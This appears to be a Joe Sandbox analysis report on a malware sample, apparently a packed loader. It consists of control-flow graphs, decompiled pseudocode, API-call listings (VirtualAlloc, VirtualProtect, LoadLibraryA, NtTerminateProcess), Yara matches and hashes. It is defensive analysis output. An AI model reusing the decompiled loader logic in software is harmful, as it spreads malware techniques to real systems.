                        control_flow_graph 163 401826-40185b call 401140 Sleep call 401381 170 40186a-40187f NtTerminateProcess 163->170 171 40185d-401865 call 401455 163->171 174 401882-4018a2 call 401140 170->174 175 401876-40187b 170->175 171->170 175->174
                        C-Code - Quality: 17%
                        			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t8;
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("sbb ebx, ebp");
                        				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401826
                        0x00401826
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000000.00000002.327476608.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                        • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 181 401834-40185b call 401140 Sleep call 401381 187 40186a-40187f NtTerminateProcess 181->187 188 40185d-401865 call 401455 181->188 191 401882-4018a2 call 401140 187->191 192 401876-40187b 187->192 188->187 192->191
                        C-Code - Quality: 20%
                        			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t10;
                        				void* _t13;
                        				intOrPtr* _t19;
                        				void* _t22;
                        				void* _t25;
                        
                        				_t26 = __eflags;
                        				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t19 =  *((intOrPtr*)(_t25 + 8));
                        				Sleep(0x1388);
                        				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                        				if(_t13 != 0) {
                        					_push( *((intOrPtr*)(_t25 + 0x14)));
                        					_push( *((intOrPtr*)(_t25 - 4)));
                        					_push(_t13);
                        					_push(_t19); // executed
                        					L00401455(0x60, _t22, __edi); // executed
                        				}
                        				 *_t19(0xffffffff, 0); // executed
                        				_t19 = _t19 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401834
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000000.00000002.327476608.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                        • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 6b003c-6b0047 1 6b0049 0->1 2 6b004c-6b0263 call 6b0a3f call 6b0e0f call 6b0d90 VirtualAlloc 0->2 1->2 17 6b028b-6b0292 2->17 18 6b0265-6b0289 call 6b0a69 2->18 20 6b02a1-6b02b0 17->20 22 6b02ce-6b03c2 VirtualProtect call 6b0cce call 6b0ce7 18->22 20->22 23 6b02b2-6b02cc 20->23 29 6b03d1-6b03e0 22->29 23->20 30 6b0439-6b04b8 VirtualFree 29->30 31 6b03e2-6b0437 call 6b0ce7 29->31 33 6b04be-6b04cd 30->33 34 6b05f4-6b05fe 30->34 31->29 38 6b04d3-6b04dd 33->38 35 6b077f-6b0789 34->35 36 6b0604-6b060d 34->36 42 6b078b-6b07a3 35->42 43 6b07a6-6b07b0 35->43 36->35 39 6b0613-6b0637 36->39 38->34 41 6b04e3-6b0505 38->41 46 6b063e-6b0648 39->46 50 6b0517-6b0520 41->50 51 6b0507-6b0515 41->51 42->43 44 6b086e-6b08be LoadLibraryA 43->44 45 6b07b6-6b07cb 43->45 55 6b08c7-6b08f9 44->55 47 6b07d2-6b07d5 45->47 46->35 48 6b064e-6b065a 46->48 52 6b07d7-6b07e0 47->52 53 6b0824-6b0833 47->53 48->35 54 6b0660-6b066a 48->54 56 6b0526-6b0547 50->56 51->56 57 6b07e2 52->57 58 6b07e4-6b0822 52->58 60 6b0839-6b083c 53->60 59 6b067a-6b0689 54->59 61 6b08fb-6b0901 55->61 62 6b0902-6b091d 55->62 63 6b054d-6b0550 56->63 57->53 58->47 64 6b068f-6b06b2 59->64 65 6b0750-6b077a 59->65 60->44 66 6b083e-6b0847 60->66 61->62 68 6b05e0-6b05ef 63->68 69 6b0556-6b056b 63->69 70 6b06ef-6b06fc 64->70 71 6b06b4-6b06ed 64->71 65->46 72 6b084b-6b086c 66->72 73 6b0849 66->73 68->38 74 6b056f-6b057a 69->74 75 6b056d 69->75 76 6b074b 70->76 77 6b06fe-6b0748 70->77 71->70 72->60 73->44 78 6b059b-6b05bb 74->78 79 6b057c-6b0599 74->79 75->68 76->59 77->76 84 6b05bd-6b05db 78->84 79->84 84->63
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.327668635.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 198 6b0e0f-6b0e24 SetErrorMode * 2 199 6b0e2b-6b0e2c 198->199 200 6b0e26 198->200 200->199
                        APIs
                        • SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
                        • SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.327668635.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 201 8bec00-8bec3a call 8bef13 204 8bec88 201->204 205 8bec3c-8bec6f VirtualAlloc call 8bec8d 201->205 204->204 207 8bec74-8bec86 205->207 207->204
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008BEC51
                        Memory Dump Source
                        • Source File: 00000000.00000002.327934318.00000000008BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008BA000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8ba000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction ID: 7c286d2eb5126431aa096fe0fa66c4cd4818292593b8c52bb7181a55d444178b
                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction Fuzzy Hash: 04112B79A00208EFDB01DF98CA85E99BFF5EF08351F058094F9489B362D775EA50DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.327668635.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$GetProcAddress.$l
                        • API String ID: 0-2784972518
                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction ID: 254654e92616fbed97a9e78bff470e723ef2f09cb09b4f77d6b80293d0aaa023
                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction Fuzzy Hash: 29316CB6900609DFEB10CF99C880AEEBBF6FF48324F24514AD441A7351D771EA85CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.327934318.00000000008BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008BA000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8ba000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction ID: 6404a30be784dbcb9b03d8aada685fea6c166a1acfcfa67975868924e1a35cdc
                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction Fuzzy Hash: 0A117C76740500AFDB44DE99DC81EE677EAFB88324B298065ED08CB312E675E802C760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.327668635.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction ID: 234ba53533d4c3da5cb596b1fc6310159d7d1ff50711d85f8090656b9c3ca7e8
                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                        • Instruction Fuzzy Hash: 0D01A7B66006048FEF21CF64C805BEB37E6FF85315F4545E5D50697381E774A9818B90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:8.9%
                        Dynamic/Decrypted Code Coverage:53.4%
                        Signature Coverage:0%
                        Total number of Nodes:103
                        Total number of Limit Nodes:8
                        execution_graph 2316 402ad1 2318 402ad2 2316->2318 2317 402b56 2318->2317 2320 40180c 2318->2320 2321 40181b 2320->2321 2322 40183e Sleep 2321->2322 2324 401859 2322->2324 2323 40186a NtTerminateProcess 2325 401876 2323->2325 2324->2323 2325->2317 2326 6e003c 2327 6e0049 2326->2327 2339 6e0e0f SetErrorMode SetErrorMode 2327->2339 2332 6e0265 2333 6e02ce VirtualProtect 2332->2333 2335 6e030b 2333->2335 2334 6e0439 VirtualFree 2338 6e04be LoadLibraryA 2334->2338 2335->2334 2337 6e08c7 2338->2337 2340 6e0223 2339->2340 2341 6e0d90 2340->2341 2342 6e0dad 2341->2342 2343 6e0dbb GetPEB 2342->2343 2344 6e0238 VirtualAlloc 2342->2344 2343->2344 2344->2332 2345 40b675 2346 40b73f __freea 2345->2346 2347 40b6b5 ___convertcp 2345->2347 2347->2346 2349 4091b3 2347->2349 2351 4091bc 2349->2351 2352 4091f9 2351->2352 2353 40a71a 2351->2353 2352->2346 2356 40a726 __calloc_impl 2353->2356 2354 40a7cf RtlAllocateHeap 2354->2356 2355 40a73e 2355->2351 2356->2354 2356->2355 2357 401818 2358 40181b 2357->2358 2359 40183e Sleep 2358->2359 2361 401859 2359->2361 2360 40186a NtTerminateProcess 2362 401876 2360->2362 2361->2360 2415 4096ba 2417 4096e1 2415->2417 2422 4097a0 2417->2422 2423 40aee0 2417->2423 2421 40b315 ___crtLCMapStringA RtlAllocateHeap 2421->2422 2424 40aef3 _LocaleUpdate::_LocaleUpdate 2423->2424 2431 40ad26 2424->2431 2426 40975b 2427 40b315 2426->2427 2428 40b328 _LocaleUpdate::_LocaleUpdate 2427->2428 2460 40af70 2428->2460 2430 40977b 2430->2421 2432 40ad47 2431->2432 2436 40ad5f __freea ___convertcp 2432->2436 2437 40b62c 2432->2437 2436->2426 2438 40b656 2437->2438 2439 40ae7d 2438->2439 2445 40a704 2438->2445 2439->2436 2441 40b675 2439->2441 2442 40b73f __freea 2441->2442 2443 40b6b5 ___convertcp 2441->2443 2442->2436 2443->2442 2444 4091b3 __calloc_crt RtlAllocateHeap 2443->2444 2444->2442 2448 40b592 2445->2448 2449 40b5ab 2448->2449 2452 40b363 2449->2452 2453 40b378 _LocaleUpdate::_LocaleUpdate 2452->2453 2455 40a715 2453->2455 2456 40b829 2453->2456 2455->2439 2457 40b83d __isleadbyte_l _LocaleUpdate::_LocaleUpdate 2456->2457 2458 40aee0 ___crtGetStringTypeA RtlAllocateHeap 2457->2458 2459 40b84a 2457->2459 2458->2459 2459->2453 2461 40af91 2460->2461 2462 40b62c ___ansicp RtlAllocateHeap 2461->2462 2466 40b006 __freea ___convertcp 2461->2466 2463 40b1d2 2462->2463 2464 40b675 ___convertcp RtlAllocateHeap 2463->2464 2463->2466 2465 40b1fd ___convertcp 2464->2465 2465->2466 2467 40b675 ___convertcp RtlAllocateHeap 2465->2467 2466->2430 2467->2466 2375 6e0005 2380 6e092b GetPEB 2375->2380 2377 6e0030 2382 6e003c 2377->2382 2381 6e0972 2380->2381 2381->2377 2383 6e0049 2382->2383 2384 6e0e0f 2 API calls 2383->2384 2385 6e0223 2384->2385 2386 6e0d90 GetPEB 2385->2386 2387 6e0238 VirtualAlloc 2386->2387 2388 6e0265 2387->2388 2389 6e02ce VirtualProtect 2388->2389 2391 6e030b 2389->2391 2390 6e0439 VirtualFree 2394 6e04be LoadLibraryA 2390->2394 2391->2390 2393 6e08c7 2394->2393 2411 402a9d 2413 402ad2 2411->2413 2412 402b56 2413->2412 2414 40180c 2 API calls 2413->2414 2414->2412 2395 6e0001 2396 6e0005 2395->2396 2397 6e092b GetPEB 2396->2397 2398 6e0030 2397->2398 2399 6e003c 7 API calls 2398->2399 2400 6e0038 2399->2400

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 85 40180c-40185b call 401140 Sleep call 401381 96 40186a-401870 NtTerminateProcess 85->96 97 40185d-401865 call 401455 85->97 98 40187f 96->98 97->96 100 401882-4018a2 call 401140 98->100 101 401876-40187b 98->101 101->100
                        C-Code - Quality: 23%
                        			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t11;
                        				void* _t16;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t22 = __eflags;
                        				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                        				_t17 = _a4;
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                        				if(_t11 != 0) {
                        					_push(_a16);
                        					_push(_v8);
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, _t20); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				return __eax;
                        			}














                        0x0040180c
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.376349644.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                        • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 107 401818-40185b call 401140 Sleep call 401381 117 40186a-40187f NtTerminateProcess 107->117 118 40185d-401865 call 401455 107->118 121 401882-4018a2 call 401140 117->121 122 401876-40187b 117->122 118->117 122->121
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.376349644.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                        • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 128 401822-40185b call 401140 Sleep call 401381 139 40186a-40187f NtTerminateProcess 128->139 140 40185d-401865 call 401455 128->140 143 401882-4018a2 call 401140 139->143 144 401876-40187b 139->144 140->139 144->143
                        C-Code - Quality: 17%
                        			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("out 0x95, eax");
                        				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}







                        0x00401822
                        0x00401822
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.376349644.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                        • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 150 401826-40185b call 401140 Sleep call 401381 157 40186a-40187f NtTerminateProcess 150->157 158 40185d-401865 call 401455 150->158 161 401882-4018a2 call 401140 157->161 162 401876-40187b 157->162 158->157 162->161
                        C-Code - Quality: 17%
                        			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t8;
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("sbb ebx, ebp");
                        				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401826
                        0x00401826
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.376349644.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                        • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 168 401834-40185b call 401140 Sleep call 401381 174 40186a-40187f NtTerminateProcess 168->174 175 40185d-401865 call 401455 168->175 178 401882-4018a2 call 401140 174->178 179 401876-40187b 174->179 175->174 179->178
                        C-Code - Quality: 20%
                        			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t10;
                        				void* _t13;
                        				intOrPtr* _t19;
                        				void* _t22;
                        				void* _t25;
                        
                        				_t26 = __eflags;
                        				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t19 =  *((intOrPtr*)(_t25 + 8));
                        				Sleep(0x1388);
                        				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                        				if(_t13 != 0) {
                        					_push( *((intOrPtr*)(_t25 + 0x14)));
                        					_push( *((intOrPtr*)(_t25 - 4)));
                        					_push(_t13);
                        					_push(_t19); // executed
                        					L00401455(0x60, _t22, __edi); // executed
                        				}
                        				 *_t19(0xffffffff, 0); // executed
                        				_t19 = _t19 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401834
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
